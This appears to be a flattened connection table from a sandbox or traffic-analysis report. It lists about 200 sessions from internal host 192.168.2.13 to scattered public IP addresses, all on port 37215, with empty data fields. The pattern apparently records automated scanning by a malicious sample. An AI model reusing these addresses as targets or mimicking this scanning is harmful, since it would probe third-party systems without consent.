                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7477192.168.2.1353876197.144.113.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7478192.168.2.1337892197.76.42.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7479192.168.2.1351594115.59.179.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7480192.168.2.1350470157.66.179.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7481192.168.2.1348748180.153.122.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7482192.168.2.1354666157.112.233.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7483192.168.2.133435841.141.120.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7484192.168.2.1360436157.22.57.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7485192.168.2.1360690197.119.183.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7486192.168.2.134652241.184.245.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7487192.168.2.1348122151.105.14.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7488192.168.2.135926041.33.252.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7489192.168.2.1332904197.7.123.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7490192.168.2.135065841.8.109.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7491192.168.2.1345568163.252.212.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7492192.168.2.1346792197.117.11.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7493192.168.2.135726481.55.75.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7494192.168.2.133924641.54.196.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7495192.168.2.1359340197.171.131.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7496192.168.2.133968241.218.209.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7497192.168.2.1334272121.171.41.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7498192.168.2.1333134148.19.74.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7499192.168.2.1341194204.16.167.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7500192.168.2.134730441.169.162.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7501192.168.2.1344940197.1.217.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7502192.168.2.133990041.102.249.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7503192.168.2.1356352197.100.34.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7504192.168.2.1339310157.160.220.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7505192.168.2.1346342197.18.71.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7506192.168.2.1336996157.100.171.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7507192.168.2.134526646.222.50.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7508192.168.2.133674264.190.56.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7509192.168.2.134268697.163.163.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7510192.168.2.134378078.158.49.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7511192.168.2.1334736165.211.48.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7512192.168.2.1349600197.126.177.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7513192.168.2.1336048157.4.104.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7514192.168.2.1359606197.133.247.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7515192.168.2.1342074197.33.198.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7516192.168.2.1334902197.26.105.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7517192.168.2.1343022157.87.238.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7518192.168.2.133415041.62.164.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7519192.168.2.134501641.221.27.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7520192.168.2.1333250202.43.142.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7521192.168.2.135885041.126.140.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7522192.168.2.135697041.188.236.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7523192.168.2.1345336197.1.138.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7524192.168.2.1347732197.42.6.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7525192.168.2.133454841.25.102.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7526192.168.2.1354462157.14.215.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7527192.168.2.1346966157.165.42.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7528192.168.2.1340468157.94.235.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7529192.168.2.1356720197.106.145.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7530192.168.2.1335882157.117.126.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7531192.168.2.1357868157.141.71.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7532192.168.2.1340968197.76.130.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7533192.168.2.134955036.61.192.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7534192.168.2.135350041.59.211.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7535192.168.2.1342446157.113.122.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7536192.168.2.135915858.104.210.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7537192.168.2.1353470197.56.52.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7538192.168.2.134790841.178.43.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7539192.168.2.1334750197.238.251.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7540192.168.2.1351410197.11.10.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7541192.168.2.1352650157.143.144.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7542192.168.2.134107641.230.78.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7543192.168.2.1336470157.87.246.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7544192.168.2.133284441.152.21.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7545192.168.2.134888441.44.249.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7546192.168.2.134088241.9.253.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7547192.168.2.1359052117.232.115.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7548192.168.2.133717441.231.13.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7549192.168.2.1348766157.12.119.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7550192.168.2.1342542197.245.64.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7551192.168.2.1339888164.69.170.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7552192.168.2.133285241.64.214.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7553192.168.2.1335088157.199.245.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7554192.168.2.135526641.202.170.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7555192.168.2.135915441.143.127.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7556192.168.2.133299841.175.155.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7557192.168.2.135222841.135.101.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7558192.168.2.134259041.122.138.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7559192.168.2.1340822217.30.225.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7560192.168.2.133626241.39.184.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7561192.168.2.1358316107.43.181.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7562192.168.2.134201641.168.224.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7563192.168.2.135016464.64.232.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7564192.168.2.1336980157.152.55.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7565192.168.2.1343008157.103.202.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7566192.168.2.1339744157.28.147.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7567192.168.2.1340340157.143.239.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7568192.168.2.1347336157.213.181.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7569192.168.2.1348096157.69.209.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7570192.168.2.1349548157.44.63.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7571192.168.2.1337286197.112.82.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7572192.168.2.135253292.191.45.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7573192.168.2.1348292197.135.82.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7574192.168.2.134254641.213.0.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7575192.168.2.135312641.195.253.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7576192.168.2.1334560157.30.190.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7577192.168.2.133669897.93.193.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7578192.168.2.1342140197.208.167.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7579192.168.2.135615241.64.33.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7580192.168.2.1360134220.5.97.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7581192.168.2.1359634157.4.100.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7582192.168.2.135135892.174.162.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7583192.168.2.13492589.40.15.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7584192.168.2.1358228157.187.162.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7585192.168.2.1343476197.43.141.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7586192.168.2.1356288197.150.141.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7587192.168.2.134345441.56.74.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7588192.168.2.134633441.7.122.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7589192.168.2.1360934208.105.247.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7590192.168.2.1358280221.5.174.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7591192.168.2.1333552197.4.212.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7592192.168.2.1333264120.135.204.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7593192.168.2.1334360197.146.227.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7594192.168.2.135702441.39.115.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7595192.168.2.135253841.81.91.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7596192.168.2.1333912157.30.1.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7597192.168.2.1345008197.34.131.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7598192.168.2.135357041.253.204.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7599192.168.2.1340308153.85.45.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7600192.168.2.1345678157.49.171.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7601192.168.2.1358624137.176.224.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7602192.168.2.1358442157.15.134.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7603192.168.2.135491241.134.14.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7604192.168.2.1342458199.38.30.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7605192.168.2.1352516157.187.140.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7606192.168.2.133849824.80.28.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7607192.168.2.133378249.198.90.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7608192.168.2.1340814197.223.146.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7609192.168.2.133648641.35.148.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7610192.168.2.1342430197.251.117.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7611192.168.2.1338200197.74.196.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7612192.168.2.1347496197.108.36.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7613192.168.2.1348302197.72.179.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7614192.168.2.1359090197.89.193.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7615192.168.2.136040041.159.8.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7616192.168.2.1339416197.140.120.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7617192.168.2.1345656197.245.111.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7618192.168.2.134767641.44.39.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7619192.168.2.135418041.201.47.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7620192.168.2.1351632157.168.211.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7621192.168.2.1334708197.241.31.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7622192.168.2.135164241.2.191.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7623192.168.2.134344489.102.15.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7624192.168.2.134698441.72.169.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7625192.168.2.1344410197.32.77.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7626192.168.2.1354086157.140.96.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7627192.168.2.1343300197.72.86.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7628192.168.2.135962841.107.73.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7629192.168.2.134082441.43.82.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7630192.168.2.1343394197.41.227.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7631192.168.2.135508869.0.116.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7632192.168.2.1343748197.68.101.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7633192.168.2.1336520197.14.108.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7634192.168.2.134034662.102.73.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7635192.168.2.1351570197.128.82.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7636192.168.2.1357328197.219.78.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7637192.168.2.1353778197.160.232.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7638192.168.2.1344932157.211.168.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7639192.168.2.1348428157.69.16.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7640192.168.2.1347212197.206.203.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7641192.168.2.1340964157.196.187.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7642192.168.2.1337122197.141.168.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7643192.168.2.1339304157.161.42.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7644192.168.2.134120241.145.160.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7645192.168.2.1344256157.245.187.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7646192.168.2.133523441.27.185.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7647192.168.2.1339030197.53.123.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7648192.168.2.1359058197.15.48.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7649192.168.2.134410641.52.141.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7650192.168.2.1338918197.93.166.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7651192.168.2.1358732157.201.82.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7652192.168.2.1336288157.90.55.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7653192.168.2.1358410197.78.10.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7654192.168.2.1346706135.238.7.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7655192.168.2.134200237.30.158.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7656192.168.2.1335998197.96.228.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7657192.168.2.134017441.41.60.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7658192.168.2.1354878197.33.176.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7659192.168.2.1335938197.238.90.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7660192.168.2.1343058197.56.187.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7661192.168.2.1348130157.142.99.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7662192.168.2.134071041.244.163.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7663192.168.2.135013641.182.171.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7664192.168.2.1354106157.234.114.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7665192.168.2.1354264157.16.217.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7666192.168.2.135442841.128.208.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7667192.168.2.1349470165.248.10.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7668192.168.2.1341226157.250.250.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7669192.168.2.134297641.136.212.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7670192.168.2.1338282197.106.33.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7671192.168.2.1353032197.85.96.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7672192.168.2.1344142157.51.220.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7673192.168.2.1348356157.241.84.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7674192.168.2.1346860197.167.42.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7675192.168.2.1337582197.74.225.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7676192.168.2.135202841.251.115.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7677192.168.2.1347932197.235.217.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7678192.168.2.136013641.252.98.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7679192.168.2.1359032157.127.84.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7680192.168.2.1359076157.249.66.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7681192.168.2.1354172197.26.57.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7682192.168.2.134184695.245.174.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7683192.168.2.1360234197.64.50.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7684192.168.2.1335466197.110.198.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7685192.168.2.1339824210.238.220.3537215
                                                  TimestampBytes transferredDirectionData


